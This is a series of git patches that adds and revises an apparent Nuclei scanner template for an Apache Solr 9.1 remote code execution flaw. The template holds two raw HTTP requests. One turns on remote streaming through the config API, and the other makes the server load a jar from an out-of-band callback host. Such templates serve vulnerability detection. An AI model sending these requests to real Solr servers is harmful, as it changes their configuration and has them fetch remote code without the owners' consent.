From 25fa0d9aa5bc933f6826061e8060288710608fa6 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Fri, 14 Apr 2023 23:18:11 +0800 Subject: [PATCH 1/6] Create apache-solr-9.1-rce.yaml --- vulnerabilities/apache-solr-9.1-rce.yaml | 45 ++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 vulnerabilities/apache-solr-9.1-rce.yaml diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-9.1-rce.yaml new file mode 100644 index 0000000000..50f220fcad --- /dev/null +++ b/vulnerabilities/apache-solr-9.1-rce.yaml @@ -0,0 +1,45 @@ +id: apache-solr-9.1-rce + +info: + name: Apache Solr 9.1 RCE + author: j4vaovo + severity: critical + description: | + Apache Solr 9.1 RCE + reference: + - https://noahblog.360.cn/apache-solr-rce/ + tags: solr,apache,rce,oast + +requests: + - raw: + - | + POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + + - | + POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 + Connection: close + + --------------------------5897997e44b07bf9 + Content-Disposition: form-data; name="stream.url" + + jar:http://{{interactsh-url}}/test.jar?!/Test.class + --------------------------5897997e44b07bf9-- + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: Java" From d7bf6709054cd06fd85614d9e76e26e3aa09128d Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Fri, 14 Apr 2023 23:24:14 +0800 Subject: [PATCH 2/6] fix id --- .../{apache-solr-9.1-rce.yaml => apache-solr-91-rce.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/{apache-solr-9.1-rce.yaml => apache-solr-91-rce.yaml} (98%) diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-91-rce.yaml similarity index 98% rename from vulnerabilities/apache-solr-9.1-rce.yaml rename to vulnerabilities/apache-solr-91-rce.yaml index 50f220fcad..bf1891c8fd 100644 --- a/vulnerabilities/apache-solr-9.1-rce.yaml +++ b/vulnerabilities/apache-solr-91-rce.yaml @@ -1,4 +1,4 @@ -id: apache-solr-9.1-rce +id: apache-solr-91-rce info: name: Apache Solr 9.1 RCE From 278e2ec6e2a1b082af33d3a8e8802c6a2928e1df Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 1 Aug 2023 10:57:33 +0530 Subject: [PATCH 3/6] Update and rename vulnerabilities/apache-solr-91-rce.yaml to http/vulnerabilities/apache/apache-solr-rce.yaml --- .../vulnerabilities/apache/apache-solr-rce.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) rename vulnerabilities/apache-solr-91-rce.yaml => http/vulnerabilities/apache/apache-solr-rce.yaml (86%) diff --git a/vulnerabilities/apache-solr-91-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml similarity index 86% rename from vulnerabilities/apache-solr-91-rce.yaml rename to http/vulnerabilities/apache/apache-solr-rce.yaml index bf1891c8fd..f8fe789fb9 100644 --- a/vulnerabilities/apache-solr-91-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-rce.yaml @@ -1,16 +1,14 @@ -id: apache-solr-91-rce +id: apache-solr-rce info: - name: Apache Solr 9.1 RCE + name: Apache Solr 9.1 - Remote Code Execution author: j4vaovo severity: critical - description: | - Apache Solr 9.1 RCE reference: - - https://noahblog.360.cn/apache-solr-rce/ + - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ tags: solr,apache,rce,oast -requests: +http: - raw: - | POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 From ce0695f2d491a7a6e946bdf85ecddf028970c9a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 1 Aug 2023 11:04:43 +0530 Subject: [PATCH 4/6] Create apache-solr-91-rce.yaml --- http/apache-solr-91-rce.yaml | 45 ++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/apache-solr-91-rce.yaml diff --git a/http/apache-solr-91-rce.yaml b/http/apache-solr-91-rce.yaml new file mode 100644 index 0000000000..bf1891c8fd --- /dev/null +++ b/http/apache-solr-91-rce.yaml @@ -0,0 +1,45 @@ +id: apache-solr-91-rce + +info: + name: Apache Solr 9.1 RCE + author: j4vaovo + severity: critical + description: | + Apache Solr 9.1 RCE + reference: + - https://noahblog.360.cn/apache-solr-rce/ + tags: solr,apache,rce,oast + +requests: + - raw: + - | + POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + + - | + POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 + Connection: close + + --------------------------5897997e44b07bf9 + Content-Disposition: form-data; name="stream.url" + + jar:http://{{interactsh-url}}/test.jar?!/Test.class + --------------------------5897997e44b07bf9-- + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: Java" From e2bc266ce29e577442c9129dd94cce860eef5ad6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 1 Aug 2023 11:06:46 +0530 Subject: [PATCH 5/6] Delete apache-solr-91-rce.yaml --- http/apache-solr-91-rce.yaml | 45 ------------------------------------ 1 file changed, 45 deletions(-) delete mode 100644 http/apache-solr-91-rce.yaml diff --git a/http/apache-solr-91-rce.yaml b/http/apache-solr-91-rce.yaml deleted file mode 100644 index bf1891c8fd..0000000000 --- a/http/apache-solr-91-rce.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: apache-solr-91-rce - -info: - name: Apache Solr 9.1 RCE - author: j4vaovo - severity: critical - description: | - Apache Solr 9.1 RCE - reference: - - https://noahblog.360.cn/apache-solr-rce/ - tags: solr,apache,rce,oast - -requests: - - raw: - - | - POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - - - | - POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 - Connection: close - - --------------------------5897997e44b07bf9 - Content-Disposition: form-data; name="stream.url" - - jar:http://{{interactsh-url}}/test.jar?!/Test.class - --------------------------5897997e44b07bf9-- - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: interactsh_request - words: - - "User-Agent: Java" From 4470bfbb29bebd648f83600c55e509dde80919b1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 2 Aug 2023 13:45:54 +0530 Subject: [PATCH 6/6] Update apache-solr-rce.yaml --- http/vulnerabilities/apache/apache-solr-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/apache/apache-solr-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml index f8fe789fb9..de21fc6b71 100644 --- a/http/vulnerabilities/apache/apache-solr-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-rce.yaml @@ -6,6 +6,8 @@ info: severity: critical reference: - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ + metadata: + max-request: 2 tags: solr,apache,rce,oast http: @@ -20,9 +22,7 @@ http: - | POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 - Connection: close --------------------------5897997e44b07bf9 Content-Disposition: form-data; name="stream.url"